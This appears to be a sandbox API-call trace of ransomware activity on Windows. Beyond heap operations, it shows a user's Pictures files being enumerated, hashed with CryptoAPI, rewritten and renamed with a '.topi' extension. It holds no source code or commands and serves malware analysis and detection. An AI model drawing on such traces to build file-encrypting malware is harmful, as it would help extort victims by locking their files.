[0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9588 | out: hHeap=0x680000) returned 1 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9570 | out: hHeap=0x680000) returned 1 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.592] GetCurrentThreadId () returned 0x8c4 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f66a0 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.592] GetCurrentThreadId () returned 0x8c4 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9570 [0095.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9588 [0095.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.594] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\khhc3Ttgbyg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\khhc3ttgbyg.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\khhc3Ttgbyg.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\khhc3ttgbyg.png.topi")) returned 1 [0095.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.595] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.597] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10456c20, ftCreationTime.dwHighDateTime=0x1d5bd0c, ftLastAccessTime.dwLowDateTime=0xe693fd10, ftLastAccessTime.dwHighDateTime=0x1d5bbe9, ftLastWriteTime.dwLowDateTime=0xe693fd10, ftLastWriteTime.dwHighDateTime=0x1d5bbe9, nFileSizeHigh=0x0, nFileSizeLow=0x43e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M-KbgZCgiX ZQ5383.gif", cAlternateFileName="M-KBGZ~1.GIF")) returned 1 [0095.597] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\M-KbgZCgiX ZQ5383.gif") returned=".gif" [0095.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\M-KbgZCgiX ZQ5383.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\m-kbgzcgix zq5383.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.597] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=1086) returned 1 [0095.597] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.600] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x418, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.600] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.600] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0095.601] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.601] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.601] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.602] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.602] GetLastError () returned 0x0 [0095.602] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.602] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0095.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.602] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.602] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.602] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x440) returned 0x31d01f0 [0095.602] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1e78 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9540 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1ec0 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9558 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9588 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95a0 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.602] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d0980 [0095.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9588 | out: hHeap=0x680000) returned 1 [0095.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95a0 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d95a0 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9588 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95a0 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9588 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.603] GetCurrentThreadId () returned 0x8c4 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6730 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0095.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.604] GetCurrentThreadId () returned 0x8c4 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9588 [0095.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95a0 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9570 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d95b8 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9588 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9588 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.606] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9588 | out: hHeap=0x680000) returned 1 [0095.606] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.606] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95b8 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95a0 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9570 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9558 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1ec0 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: 